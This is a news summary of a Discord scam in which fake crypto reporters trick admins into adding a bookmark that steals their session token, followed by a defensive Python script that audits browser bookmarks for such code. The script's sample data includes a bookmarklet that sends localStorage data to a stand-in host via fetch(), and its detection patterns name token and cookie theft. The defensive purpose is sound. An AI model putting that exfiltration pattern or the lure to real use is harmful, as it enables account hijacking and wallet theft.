This past month, a number of Discord communities centered on cryptocurrencies were compromised after their administrators were duped into executing malicious JavaScript code disguised as a web browser bookmark, according to KrebsOnSecurity. According to interviews with victims, some of the attacks started with an interview request from someone pretending to be a reporter for an online news organization that focuses on cryptocurrency. Those who fall for the scam are given a link to a Discord server that appears to be the official one for the cryptocurrency news website. Once there, they are asked to complete a verification step so that their identities can be confirmed.
The verification procedure requires dragging a button from the fake crypto news Discord server to the bookmarks bar in one’s web browser, as seen in this video on YouTube. The visitor then sees instructions telling them to return to discord.com and click the new bookmark to finish the verification procedure.
However, the bookmark is really a devious piece of JavaScript that stealthily takes the user’s Discord token and transmits it to the scammer’s website. Because a bookmark whose address is JavaScript runs in the context of whatever page is open when it is clicked, clicking it on discord.com gives the code access to the logged-in session. The attacker then loads the stolen token into their own browser session and (often late at night, after the administrators have gone to sleep) posts an announcement in the targeted Discord touting an exclusive “airdrop,” “NFT mint event,” or some other prospective money-making opportunity for the Discord’s members.
When unwary Discord users follow the link supplied by the hijacked administrator account, they are asked to connect their cryptocurrency wallet to the scammer’s site. Once connected, the scammer’s site requests unlimited spend permissions on the members’ tokens and then empties the balance of any valuable accounts.
Meanwhile, any user in the hijacked Discord channel who recognizes the fraud and responds to it will have their account terminated, and the compromised admin account will delete their messages.
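A defender can check a browser profile for the kind of bookmark described above. The following is an added example, not code from the original article: it assumes a Chromium-style `Bookmarks` JSON file (a `roots` object containing folders and `url` nodes), and the indicator patterns, sample data and `collector.example` host are constructed for illustration.

```python
import json
import re
from urllib.parse import unquote

# Heuristic indicators chosen for this example; not an exhaustive list.
NETWORK_SINKS = re.compile(r"fetch\s*\(|XMLHttpRequest|sendBeacon|WebSocket|new\s+Image", re.I)
SECRET_SOURCES = re.compile(r"localStorage|sessionStorage|document\.cookie|token", re.I)

def walk(node, path=""):
    """Yield (folder_path, name, url) for every URL node below a bookmark folder."""
    if node.get("type") == "url":
        yield path, node.get("name", ""), node.get("url", "")
        return
    here = f"{path}/{node.get('name', '')}"
    for child in node.get("children", []):
        yield from walk(child, here)

def audit_bookmarks(bookmarks_json):
    """Return one finding per javascript: bookmark, rated 'high' or 'review'."""
    findings = []
    for root in json.loads(bookmarks_json).get("roots", {}).values():
        if not isinstance(root, dict):
            continue
        for path, name, url in walk(root):
            if not url.strip().lower().startswith("javascript:"):
                continue
            body = unquote(url)  # bookmarklets are often stored percent-encoded
            reasons = []
            if NETWORK_SINKS.search(body):
                reasons.append("can send data to another host")
            if SECRET_SOURCES.search(body):
                reasons.append("reads storage, cookies or tokens")
            findings.append({"folder": path, "name": name, "reasons": reasons,
                             "severity": "high" if len(reasons) == 2 else "review"})
    return findings

# Constructed sample input: no real bookmark file, host or payload.
SAMPLE = json.dumps({"version": 1, "roots": {
    "bookmark_bar": {"type": "folder", "name": "Bookmarks bar", "children": [
        {"type": "url", "name": "Discord", "url": "https://discord.com/app"},
        {"type": "url", "name": "Verify", "url": "javascript:fetch%28%27https://"
         "collector.example/v%3Fn%3D%27%2BlocalStorage.length%29"}]},
    "other": {"type": "folder", "name": "Other bookmarks", "children": [
        {"type": "url", "name": "Bigger text",
         "url": "javascript:void(document.body.style.fontSize='20px')"}]}}})

if __name__ == "__main__":
    for f in audit_bookmarks(SAMPLE):
        print(f["severity"], f["folder"], f["name"], f["reasons"])
```

Any `javascript:` bookmark that a user did not create deliberately deserves review; the "high" rating only marks those that both read session data and contact another host.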